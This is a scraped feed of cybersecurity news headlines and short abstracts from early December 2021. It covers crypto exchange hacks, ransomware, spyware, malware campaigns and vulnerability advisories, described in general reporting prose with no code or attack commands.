Cryptocurrency trading platform BitMart has disclosed a "large-scale security breach" that it blamed on a stolen private key, resulting in the theft of more than $150 million in various cryptocurrencies. The breach is said to have impacted two of its hot wallets on the Ethereum (ETH) blockchain and the Binance smart chain (BSC). The company noted that the wallets carried only a "small percentage" of the assets." Hot wallets, as opposed to their cold counterparts, are connected to the internet and allow cryptocurrency owners to receive and send tokens. Blockchain security and data analytics company PeckShield estimated the total loss to be around $200 million, calling the whole chain of events as "Pretty straightforward: transfer-out, swap, and wash." "This security breach was mainly caused by a stolen private key that had two of our hot wallets compromised," BitMart's chief executive Sheldon Xia said in a series of tweets sentThe Hacker News
December 6, 2021 – Attack
DMEA Colorado electric utility hit by a disruptive cyberattack Full Text
Abstract
A ransomware attack hit an electric utility in Colorado causing a significant disruption and damage. The Delta-Montrose Electric Association (DMEA) is a local electric cooperative located in Colorado, it is part of Touchstone Energy Cooperatives. The...Security Affairs
December 6, 2021 – Government
Cyber Command Publicly Joins Fight Against Ransomware Groups Full Text
Abstract
U.S. military acknowledges targeting cybercriminals who launch attacks on U.S. companies.Threatpost
December 06, 2021 – Solution
WhatsApp adds default disappearing messages for new chats Full Text
Abstract
WhatsApp announced today that it had expanded the privacy control features with the addition of default disappearing messages for all newly initiated chats.BleepingComputer
December 6, 2021 – APT
RTF Template Injection Technique Becomes Popular Among APT Groups Full Text
Abstract
Proofpoint identified three state-sponsored threat actors from India, Russia, and China adopting RTF template injection methods in their phishing campaigns. The adoption of this technique has made attacks from the group much harder to detect and prevent. Therefore, o rganizations are suggested to d ... Read MoreCyware Alerts - Hacker News
December 06, 2021 – Breach
Over $150 million stolen by hackers from cryptocurrency exchange BitMart Full Text
Abstract
Hackers stole at least $150 million from cryptocurrency exchange BitMart as part of what the company described Monday as a “large-scale security breach.”The Hill
December 06, 2021 – Vulnerabilities
14 New XS-Leaks (Cross-Site Leaks) Attacks Affect All Modern Web Browsers Full Text
Abstract
Researchers have discovered 14 new types of cross-site data leakage attacks against a number of modern web browsers, including Tor Browser, Mozilla Firefox, Google Chrome, Microsoft Edge, Apple Safari, and Opera, among others. Collectively known as "XS-Leaks," the browser bugs enable a malicious website to harvest personal data from its visitors as they interact with other websites in the background without the targets' knowledge. The findings are the result of a comprehensive study of cross-site attacks undertaken by a group of academics from Ruhr-Universität Bochum (RUB) and Niederrhein University. "XS-Leaks bypass the so-called same-origin policy , one of a browser's main defences against various types of attacks," the researchers said in a statement. "The purpose of the same-origin policy is to prevent information from being stolen from a trusted website. In the case of XS-Leaks, attackers can nevertheless recognize individual, small detailsThe Hacker News
December 6, 2021 – Hacker
Threat actors stole more than $150 million worth of cryptocurrency tokens from BitMart platform Full Text
Abstract
Threat actors stole more than $150 million in various cryptocurrencies from the cryptocurrency trading platform BitMart. Cryptocurrency trading platform BitMart has disclosed a security breach, threat actors stole than $150 million in various cryptocurrencies....Security Affairs
December 06, 2021 – Hacker
Russian hacking group uses new stealthy Ceeloader malware Full Text
Abstract
The Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.BleepingComputer
December 6, 2021 – Privacy
American diplomats’ iPhones reportedly compromised by NSO Group intrusion software Full Text
Abstract
The Apple iPhones of at least nine US State Department officials were compromised by an unidentified entity using NSO Group's Pegasus spyware, according to a report published Friday by Reuters.The Register
December 6, 2021 – Hacker
Hackers are sending receipts with anti-work messages to businesses’ printers Full Text
Abstract
Hackers are targeting printers of businesses around the world to print ‘anti-work’ slogans pushing workers to demand better pay. Multiple employees are sharing on Twitter and Reddit the images of anti-work messages sent to the printers of their...Security Affairs
December 6, 2021 – General
ASIC says financial market cyber resiliency remained steady but fell short of target Full Text
Abstract
Firms in Australia's financial market have continued to be resilient against cyber threats, with improvement rates in cyber resiliency remaining steady, the ASIC reported on Monday.ZDNet
December 6, 2021 – Malware
Magnat malvertising campaigns spreads malicious Chrome extensions, backdoors and info stealers Full Text
Abstract
Experts spotted a series of malvertising campaigns using fake installers of popular apps and games to deliver a backdoor and a malicious Chrome extension. Talos researchers spotted a series of malvertising campaigns using fake installers of popular...Security Affairs
December 6, 2021 – Vulnerabilities
Millions of Users Impacted by Discovery of Hundreds of Vulnerabilities in Common Wi-Fi Routers Full Text
Abstract
The router affected by most of the flaws is the TP-Link Archer AX6000 (32 vulnerabilities), followed by Synology RT-2600ac with 30 issues and by Netgear Nighthawk AX12 with 29 flaws.Security Affairs
December 6, 2021 – Malware
Emotet Spreads Again with Fake App Installers Full Text
Abstract
Threat actors behind Emotet are penetrating inside networks through malicious Windows App Installer packages by imitating Adobe PDF software. The campaign uses stolen reply-chain emails that seem to be a reply to an existing conversation. Once the install button is clicked, the installer downloads ... Read MoreCyware Alerts - Hacker News
December 05, 2021 – Phishing
As Twitter removes blue badges for many, phishing targets verified accounts Full Text
Abstract
A new phishing campaign has been targeting verified Twitter accounts, as seen by BleepingComputer. The phishing campaign follows Twitter's recent removal of the checkmark from a number of verified accounts, citing that these were ineligible for the legendary status, and verified in error.BleepingComputer
December 05, 2021 – Malware
Malicious Excel XLL add-ins push RedLine password-stealing malware Full Text
Abstract
Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.BleepingComputer
December 5, 2021 – Cryptocurrency
Tor2mine Cryptominer Evolves to Pose a Bigger Threat Full Text
Abstract
Tor2Mine, a cryptominer which has been under active development since 2019, uses a PowerShell script to disable anti-malware solutions, deploy the payload, and steal Windows credentials.Cyware Alerts - Hacker News
December 5, 2021 – General
Security Affairs newsletter Round 343 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
December 05, 2021 – Phishing
Convincing Microsoft phishing uses fake Office 365 spam alerts Full Text
Abstract
A persuasive and ongoing series of phishing attacks are using fake Office 365 notifications asking the recipients to review blocked spam messages, with the end goal of stealing their Microsoft credentials.BleepingComputer
December 5, 2021 – Vulnerabilities
Hundreds of vulnerabilities in common Wi-Fi routers affect millions of users Full Text
Abstract
Researchers discovered a total of 226 potential security vulnerabilities in nine Wi-Fi popular routers from known manufacturers. Security researchers and editors with the German IT magazine CHIP have discovered 226 potential security defects in nine...Security Affairs
December 05, 2021 – Phishing
New Twitter phishing campaign targets verified accounts Full Text
Abstract
A new phishing campaign has been targeting verified Twitter accounts, as seen by BleepingComputer. The phishing campaign follows Twitter's recent removal of the checkmark from a number of verified accounts, citing that these were ineligible for the legendary status, and verified in error.BleepingComputer
December 5, 2021 – Government
German BSI agency warns of ransomware attacks over Christmas holidays Full Text
Abstract
German BSI warns of ransomware attacks over the Christmas and end-of-year holidays, fearing Emotet return and attacks on Microsoft Exchange servers. The German cybersecurity authority BSI warns of ransomware attacks over the Christmas holidays, fearing...Security Affairs
December 04, 2021 – Privacy
Pegasus Spyware Reportedly Hacked iPhones of U.S. State Department and Diplomats Full Text
Abstract
Apple reportedly notified several U.S. Embassy and State Department employees that their iPhones may have been targeted by an unknown assailant using state-sponsored spyware created by the controversial Israeli company NSO Group, according to multiple reports from Reuters and The Washington Post . At least 11 U.S. Embassy officials stationed in Uganda or focusing on issues pertaining to the country are said to have singled out using iPhones registered to their overseas phone numbers, although the identity of the threat actors behind the intrusions, or the nature of the information sought, remains unknown as yet. The attacks, which were carried out in the last several months, mark the first known time the sophisticated surveillance software has been put to use against U.S. government employees. NSO Group is the maker of Pegasus , military-grade spyware that allows its government clients to stealthily plunder files and photos, eavesdrop on conversations, and track the whereabouThe Hacker News
December 4, 2021 – Ransomware
Thieflock and Yanluowang Ransomware Share Same Genes Full Text
Abstract
Symantec has reported a link between Thieflock and Yanluowang ransomware operations. The latter recently picked up its pace to target financial companies in the U.S. Researchers believe that the attackers are highly attack-oriented because the ransomware behavior hasn’t altered since its discovery ... Read MoreCyware Alerts - Hacker News
December 4, 2021 – Government
FBI: Cuba ransomware group hit 49 critical infrastructure organizations Full Text
Abstract
The FBI has released a new notice about the Cuba ransomware, explaining that the group has attacked "49 entities in five critical infrastructure sectors" and made at least $43.9 million in ransom payments.ZDNet
December 04, 2021 – Malware
Malicious KMSPico installers steal your cryptocurrency wallets Full Text
Abstract
Threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.BleepingComputer
December 4, 2021 – APT
Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability Full Text
Abstract
An APT group is leveraging a critical vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus to compromise organizations in a variety of sectors, including defense and tech.Help Net Security
December 4, 2021 – Criminals
Cuba ransomware gang hacked 49 US critical infrastructure organizations Full Text
Abstract
The FBI has revealed that the Cuba ransomware gang breached the networks of at least 49 US critical infrastructure organizations. A flash alert published by the FBI has reported that the Cuba ransomware gang breached the networks of at least 49 US critical...Security Affairs
December 4, 2021 – Hacker
Hackers steal $120m from Badger Defi and $30m from MonoX Full Text
Abstract
Two DeFi projects BadgerDAO and MonoX are the latest victims of security breaches in which hundreds of millions of dollars worth of cryptocurrency has been stolen by hackers.Hackread
December 4, 2021 – Government
CISA warns of vulnerabilities in Hitachi Energy products Full Text
Abstract
CISA has released six advisories to warn organizations about security vulnerabilities affecting Hitachi Energy products The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published six advisories to inform organizations about the availability...Security Affairs
December 03, 2021 – Breach
State Department employee phones hacked through NSO Group spyware: report Full Text
Abstract
The phones of at least nine State Department employees were recently hacked through the use of spyware from Israeli company NSO Group, a report published Friday found.The Hill
December 3, 2021 – Education
Cybersecurity for Idiots Full Text
Abstract
One of cybersecurity’s major challenges is cyberstupidity, and regulators struggle to keep pace with rapidly changing technologies. Adopting a cybersecurity approach conceptually modeled on tort’s negligence per se doctrine, regulators can reduce widespread failures.Lawfare
December 03, 2021 – Attack
Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks Full Text
Abstract
Enterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months. The issue, assigned the identifier CVE-2021-44515 , is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server. "If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution," Zoho cautioned in an advisory . "As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible." The company has also made available an Exploit Detection Tool that will help customers identify sigThe Hacker News
December 03, 2021 – Hacker
Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments Full Text
Abstract
A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy , which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution. "The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said , adding the embedded files are tailored to target government and military officials based in Afghanistan and India. The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by theThe Hacker News
December 03, 2021 – Malware
New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions Full Text
Abstract
A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension with the goal of stealing credentials and data stored in the compromised systems as well as maintaining persistent remote access. Cisco Talos attributed the malware payloads to an unknown actor that goes by the alias " magnat ," noting that "these two families have been subject to constant development and improvement by their authors." The attacks are believed to have commenced in late 2018, with intermittent activity observed towards the end of 2019 and through early 2020, followed by fresh spikes since April 2021, while mainly singling out users in Canada, followed by the U.S., Australia, Italy, Spain, and Norway. A noteworthy aspect of the intrusions is the use of malvertising as a means to strike individuaThe Hacker News
December 03, 2021 – Ransomware
The Week in Ransomware - December 3rd 2021 - Seizing Bitcoin Full Text
Abstract
For this week's 'Week in Ransomware' article we have included the latest ransomware news over the past two weeks.BleepingComputer
December 03, 2021 – Government
Why Everyone Needs to Take the Latest CISA Directive Seriously Full Text
Abstract
Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But, in the instance of the latest CISA directive, that would be making a mistake. In this article, we explain why, even if you're in the private or non-government sector, you should nonetheless take a close look at CISA Binding Operational Directive 22-01. We outline why CISA was forced to issue this directive, and why that firm action has implications for all organizations – inside and outside of government. Acting on cybersecurity issues isn't as simple as flicking a switch, of course, so keep reading to find out how you can address the core issue behind the CISA directive. Okay, so what exactly is a CISA directive? Let's take a step back to gain some context. Just like any organThe Hacker News
December 03, 2021 – Breach
US State Dept employees’ phones hacked using NSO spyware Full Text
Abstract
Apple has warned US Department of State employees that their iPhones have been hacked by unknown attackers using an iOS exploit dubbed ForcedEntry to deploy Pegasus spyware developed by Israeli surveillance firm NSO Group.BleepingComputer
December 3, 2021 – Criminals
Hackers Steal $120 Million from Badger DeFi Platform Full Text
Abstract
Hackers have stolen an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform that allows users to borrow, loan, and speculate on cryptocurrency price variations.The Record
December 03, 2021 – Malware
New Payment Data Stealing Malware Hides in Nginx Process on Linux Servers Full Text
Abstract
E-commerce platforms in the U.S., Germany, and France have come under attack from a new form of malware that targets Nginx servers in an attempt to masquerade its presence and slip past detection by security solutions. "This novel code injects itself into a host Nginx application and is nearly invisible," Sansec Threat Research team said in a new report. "The parasite is used to steal data from eCommerce servers, also known as 'server-side Magecart.'" A free and open-source software, Nginx is a web server that can also be used as a reverse proxy, load balancer, mail proxy, and HTTP cache. NginRAT, as the advanced malware is called, works by hijacking a host Nginx application to embed itself into the webserver process. The remote access trojan itself is delivered via CronRAT , another piece of malware the Dutch cybersecurity firm disclosed last week as hiding its malicious payloads in cron jobs scheduled to execute on February 31st, a non-existent caThe Hacker News
December 3, 2021 – Privacy
NSO Group spyware used to compromise iPhones of 9 US State Dept officials Full Text
Abstract
Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group 's Pegasus spyware. The iPhones of at least nine US state department officials were compromised with the NSO Group's spyware Pegasus. The...Security Affairs
December 03, 2021 – Malware
Fake support agents call victims to install Android banking malware Full Text
Abstract
The BRATA Android remote access trojan (RAT) has been spotted in Italy, with threat actors calling victims of SMS attacks to steal their online banking credentials.BleepingComputer
December 3, 2021 – Phishing
Now Anyone can Phish with Phishing Kits Full Text
Abstract
Phishing kits enable non-technical criminals to readily leverage new techniques. These kits contain a set of tools that allow wannabe criminals to build and launch their own phishing campaigns.Cyware Alerts - Hacker News
December 3, 2021 – Hacker
KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays Full Text
Abstract
Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users. A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize...Security Affairs
December 03, 2021 – Government
FBI: Cuba ransomware breached 49 US critical infrastructure orgs Full Text
Abstract
The Federal Bureau of Investigation (FBI) has revealed that the Cuba ransomware gang has compromised the networks of at least 49 organizations from US critical infrastructure sectors.BleepingComputer
December 3, 2021 – Vulnerabilities
Critical Flaw in NSS Cryptographic Library Affects Several Popular Applications Full Text
Abstract
The security defect may also impact applications that employ NSS for validating certificates, or for additional CRL, OCSP, TLS, or X.509 functionality, depending on how NSS is configured.Security Week
December 3, 2021 – Criminals
Threat actors stole $120 M in crypto from BadgerDAO DeFi platform Full Text
Abstract
Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO. Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto...Security Affairs
December 03, 2021 – Attack
Researchers discover 14 new data-stealing web browser attacks Full Text
Abstract
IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox.BleepingComputer
December 3, 2021 – Business
Security Analytics Startup Panther Labs Scores $120M Investment Full Text
Abstract
Panther Labs, an early-stage startup that specializes in detection and response analytics, has raised $120 million in a new Series B round of funding led by Coatue Management.Security Week
December 3, 2021 – Covid-19
Watch out for Omicron COVID-19-themed phishing messages! Full Text
Abstract
Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns. Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing...Security Affairs
December 03, 2021 – Vulnerabilities
Zoho: Patch new ManageEngine bug exploited in attacks ASAP Full Text
Abstract
Business software provider Zoho urged customers today to update their Desktop Central and Desktop Central MSP installations to the latest available version.BleepingComputer
December 2, 2021 – General
‘Double-Extortion’ Ransomware Damage Skyrockets 935% Full Text
Abstract
Startling triple-digit growth is fueled by easy criminal access to corporate networks and RaaS tools, an analysis found.Threatpost
December 2, 2021 – Breach
Planned Parenthood Breach Opens Patients to Follow-On Attacks Full Text
Abstract
Cyberattackers made off with addresses, insurance information, dates of birth, and most worryingly, clinical information, such as diagnosis, procedures, and/or prescription information.Threatpost
December 2, 2021 – Botnet
AT&T Takes Steps to Mitigate Botnet Found Inside Its Network Full Text
Abstract
AT&T is battling a modular malware called EwDoor on 5,700 VoIP servers, but it could have a larger wildcard certificate problem.Threatpost
December 02, 2021 – Government
CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities. Tracked as CVE-2021-44077 (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, "allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files," CISA said . "A security misconfiguration in ServiceDesk Plus led to the vulnerability," Zoho noted in an independent advisory published on November 22. "This vulnerability can allow an adversary to execute arbitrary codeThe Hacker News
December 02, 2021 – Phishing
Phishing actors start exploiting the Omicron COVID-19 variant Full Text
Abstract
Phishing actors have quickly started to exploit the emergence of the Omicron COVID-19 variant and now use it as a lure in their malicious email campaigns.BleepingComputer
December 2, 2021 – Malware
Bogus Android App Steals Banking Credentials from Malaysian Individuals Full Text
Abstract
Initially noticed by MalwareHunterTeam and later analyzed by security experts at Cyblis, this application is promoted via numerous bogus or copied websites and social media accounts in order to advertise the malicious APK ‘Cleaning Service Malaysia.’Heimdal Security
December 02, 2021 – Government
Federal watchdog warns security of US infrastructure ‘in jeopardy’ without action Full Text
Abstract
A federal watchdog agency on Thursday released findings highlighting serious concerns around cybersecurity vulnerabilities in U.S. critical infrastructure, warning that these systems are “in jeopardy” if the government fails to take action.The Hill
December 02, 2021 – Solution
Meta Expands Facebook Protect Program to Activists, Journalists, Government Officials Full Text
Abstract
Meta, the company formerly known as Facebook, on Thursday announced an expansion of its Facebook Protect security program to include human rights defenders, activists, journalists, and government officials who are more likely to be targeted by bad actors across its social media platforms. "These people are at the center of critical communities for public debate," said Nathaniel Gleicher, head of security policy at Meta. "They enable democratic elections, hold governments and organizations accountable, and defend human rights around the world. Unfortunately this also means that they are highly targeted by bad actors." Facebook Protect , currently being launched globally in phases, enables users who enroll for the initiative to adopt stronger account security protections, like two-factor authentication (2FA), and watch out for potential hacking threats. Meta said more than 1.5 million accounts have enabled Facebook Protect to date, of which nearly 950,000 accountThe Hacker News
December 2, 2021 – Government
CISA adds Zoho, Apache, Qualcomm, Mikrotik flaws to the list of actively exploited issues Full Text
Abstract
U.S. CISA urges to address vulnerabilities Qualcomm, Mikrotik, Zoho and the Apache Software Foundation software. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its catalog of actively exploited vulnerabilities recommending...Security Affairs
December 02, 2021 – Government
Twitter removes 3,400 accounts used in govt propaganda campaigns Full Text
Abstract
Twitter today announced the permanent removal of more than 3,400 accounts linked to governments of six countries running manipulation or spam campaigns.BleepingComputer
December 2, 2021 – Malware
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux task scheduling system (cron) on February 31st.Security Affairs
December 02, 2021 – Government
TSA issues directives to rail sector to strengthen cybersecurity Full Text
Abstract
The Transportation Security Administration (TSA) on Thursday issued two security directives requiring rail and rail transit groups to implement steps to strengthen cybersecurity of the sector, including a requirement to report cyber incidents to the federal government.The Hill
December 02, 2021 – Malware
Researches Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks Full Text
Abstract
Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to cyber espionage and exfiltrate classified information. "All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks," ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks. Air-gapping is a network security measure designed to prevent unauthorized access to systems by physically isolating them from other unsecured networks, including local area networks and the public internet. This also implies that the only way to transfer data is by connecting a physical device to it, such as USB drives or external hard disks. Given that the mechanism is one of the most common ways SCADThe Hacker News
December 2, 2021 – Privacy
Russian internet watchdog Roskomnadzor bans six more VPN services Full Text
Abstract
Russia’s internet watchdog, ‘Roskomnadzor’, has announced the ban of other VPN products, 15 VPN services are now illegal in Russia Russian communications watchdog Roskomnadzor tightens the control over the Internet and blocked access to six more...Security Affairs
December 02, 2021 – Hacker
Hackers use in-house Zoho ServiceDesk exploit to drop webshells Full Text
Abstract
An advanced persistent threat (APT) group that had been exploiting a flaw in the Zoho ManageEngine ADSelfService Plus software has pivoted to leveraging a different vulnerability in another Zoho product.BleepingComputer
December 2, 2021 – Malware
Emotet trojan returned after the takedown: detected in Japan Full Text
Abstract
Emotet trojan is an infection that spreads using phishing email campaigns with malicious attachments. Once the file gets dropped on the machine, malware can steal emails, credentials, run malware tile TrickBot or Qbot delivered previously.2-Spyware
December 02, 2021 – Privacy
Facebook taking steps to secure accounts of activists, journalists, officials Full Text
Abstract
Facebook on Thursday rolled out a new set of measures designed to further protect accounts more often targeted by hackers, including those of human rights activists, journalists and government officials, among others.The Hill
December 02, 2021 – Education
Let there be light: Ensuring visibility across the entire API lifecycle Full Text
Abstract
The following article is based on a webinar series on enterprise API security by Imvision , featuring expert speakers from IBM, Deloitte, Maersk, and Imvision discussing the importance of centralizing an organization's visibility of its APIs as a way to accelerate remediation efforts and improve the overall security posture. Centralizing security is challenging in today's open ecosystem When approaching API visibility, the first thing we have to recognize is that today's enterprises actively avoid managing all their APIs through one system. According to IBM's Tony Curcio, Director of Integration Engineering, many of his enterprise customers already work with hybrid architectures that leverage classic on-premise infrastructure while adopting SaaS and IaaS across various cloud vendors. These architectures aim to increase resilience and flexibility, but are well aware that it complicates centralization efforts' to: 'These architectures aim to increase resilieThe Hacker News
December 2, 2021 – Malware
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions. Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT,...Security Affairs
December 02, 2021 – Vulnerabilities
Nine WiFi routers used by millions were vulnerable to 226 flaws Full Text
Abstract
Security researchers analyzed nine popular WiFi routers and found a total of 226 potential vulnerabilities in them, even when running the latest firmware.BleepingComputer
December 2, 2021 – Malware
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension Full Text
Abstract
This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted mainly Canada, along with the U.S., Australia and some EU countries.Cisco Talos
December 2, 2021 – Criminals
Europol arrested 1800 money mules as part of an anti-money-laundering operation Full Text
Abstract
Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7. Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering...Security Affairs
December 02, 2021 – Malware
New malware hides as legit nginx process on e-commerce servers Full Text
Abstract
eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.BleepingComputer
December 2, 2021 – Ransomware
Hospital Ransomware Attacks Go Beyond Health Care Data Full Text
Abstract
In a 2021 survey conducted of 597 health delivery organizations (HDOs), 42% had faced two ransomware attacks in the past couple of years. Over a third (36%) attributed those ransomware incidents to a third party.Security Intelligence
December 2, 2021 – Vulnerabilities
Mozilla fixes critical flaw in Network Security Services (NSS) cryptography library Full Text
Abstract
Mozilla fixed a critical memory corruption issue affecting its cross-platform Network Security Services (NSS) set of cryptography libraries. Mozilla has addressed a heap-based buffer overflow vulnerability (CVE-2021-43527) in its cross-platform Network...Security Affairs
December 2, 2021 – Business
SpeQtral raises $8.3M to develop quantum-secure communication systems Full Text
Abstract
The funds will be used to expand SpeQtral’s regional and international presence, establish strategic business partnerships, hire top talent, support the commercial rollout of terrestrial systems, and further develop its satellite-based systems.Help Net Security
December 2, 2021 – Phishing
How phishing kits are enabling a new legion of pro phishers Full Text
Abstract
Malicious emails can be used to reach many targets with relative ease, and criminals can purchase ready-made phishing kits that bundle together everything they need for a lucrative campaign.Help Net Security
December 1, 2021 – Vulnerabilities
80K Retail WooCommerce Sites Exposed by Plugin XSS Bug Full Text
Abstract
The Variation Swatches plugin security flaw lets attackers with low-level permissions tweak important settings on e-commerce sites to inject malicious scripts.Threatpost
December 1, 2021 – Criminals
Stealthy ‘WIRTE’ Gang Targets Middle Eastern Governments Full Text
Abstract
Kaspersky researchers suspect that the cyberattackers may be a subgroup of the politically motivated, Palestine-focused Gaza Cybergang.Threatpost
December 1, 2021 – Attack
Widespread ‘Smishing’ Campaign Defrauds Iranian Android Users Full Text
Abstract
Attackers use socially engineered SMS messages and malware to compromise tens of thousands of devices and drain user bank accounts.Threatpost
December 01, 2021 – Phishing
Researchers Warn Iranian Users of Widespread SMS Phishing Campaigns Full Text
Abstract
Socially engineered SMS messages are being used to install malware on Android devices as part of a widespread phishing campaign that impersonates the Iranian government and social security services to make away with credit card details and steal funds from victims' bank accounts. Unlike other variants of banking malware that bank of overlay attacks to capture sensitive data without the knowledge of the victim, the financially motivated operation uncovered by Check Point Research is designed to trick the targets into handing over their credit card information by sending them a legitimate-looking SMS message that contains a link, which, when clicked, downloads a malware-laced app onto their devices. "The malicious application not only collects the victim's credit card numbers, but also gains access to their 2FA authentication SMS, and turn[s] the victim's device into a bot capable of spreading similar phishing SMS to other potential victims," Check Point researThe Hacker News
December 01, 2021 – Policy and Law
Russian Man Gets 60 Months Jail for Providing Bulletproof Hosting to Cyber Criminals Full Text
Abstract
A Russian national charged with providing bulletproof hosting services for cybercriminals, who used the platform to spread malware and attack U.S. organizations and financial institutions between 2009 to 2015, has received a 60-month prison sentence. 34-year-old Aleksandr Grichishkin, along with Andrei Skvortsov, founded the bulletproof hosting service and rented its infrastructure to other criminal clientele for distributing a wide range of malware and attempted to cause millions of dollars in losses to U.S. victims. Skvortsov is pending sentencing and faces a maximum penalty of 20 years in prison. Bulletproof hosting operations are similar to regular web hosting, but are a lot more lenient about what can be hosted on their servers. They are known for providing secure hosting for malicious content and activity and assuring anonymity to threat actors. Grichishkin, in May, pleaded guilty to conspiracy to engage in a racketeer-influenced corrupt organization (RICO). Acting as thThe Hacker News
December 01, 2021 – Breach
Planned Parenthood LA discloses data breach after ransomware attack Full Text
Abstract
Planned Parenthood Los Angeles has disclosed a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.BleepingComputer
December 01, 2021 – Vulnerabilities
Critical Bug in Mozilla’s NSS Crypto Library Potentially Affects Several Other Software Full Text
Abstract
Mozilla has rolled out fixes to address a critical security weakness in its cross-platform Network Security Services ( NSS ) cryptographic library that could be potentially exploited by an adversary to crash a vulnerable application and even execute arbitrary code. Tracked as CVE-2021-43527, the flaw affects NSS versions prior to 3.73 or 3.68.1 ESR, and concerns a heap overflow vulnerability when verifying digital signatures such as DSA and RSA-PSS algorithms that are encoded using the DER binary format. Credited with reporting the issue is Tavis Ormandy of Google Project Zero, who codenamed it " BigSig ." "NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures," Mozilla said in an advisory published Wednesday. "Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted." NSS is aThe Hacker News
December 01, 2021 – Malware
Emotet now spreads via fake Adobe Windows App Installer packages Full Text
Abstract
The notorious Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.BleepingComputer
December 1, 2021 – Botnet
TrickBot Again (But With a Twist) Checks Screen Resolution to Avoid Detection Full Text
Abstract
The Trickbot gang is once again doing a screen resolution check to identify virtual machines before deploying payloads, and hence trying to stay under the radar with its improved techniques. Experts say it is for the first time that a gang is using a script in an HTML attachment to check for screen ... Read MoreCyware Alerts - Hacker News
December 01, 2021 – Breach
Data on thousands of Planned Parenthood Los Angeles patients breached Full Text
Abstract
Planned Parenthood Los Angeles (PPLA) announced Wednesday that it had been the target of a “cybersecurity incident” that compromised patient information.The Hill
December 01, 2021 – Botnet
New EwDoor Botnet Targeting Unpatched AT&T Network Edge Devices Full Text
Abstract
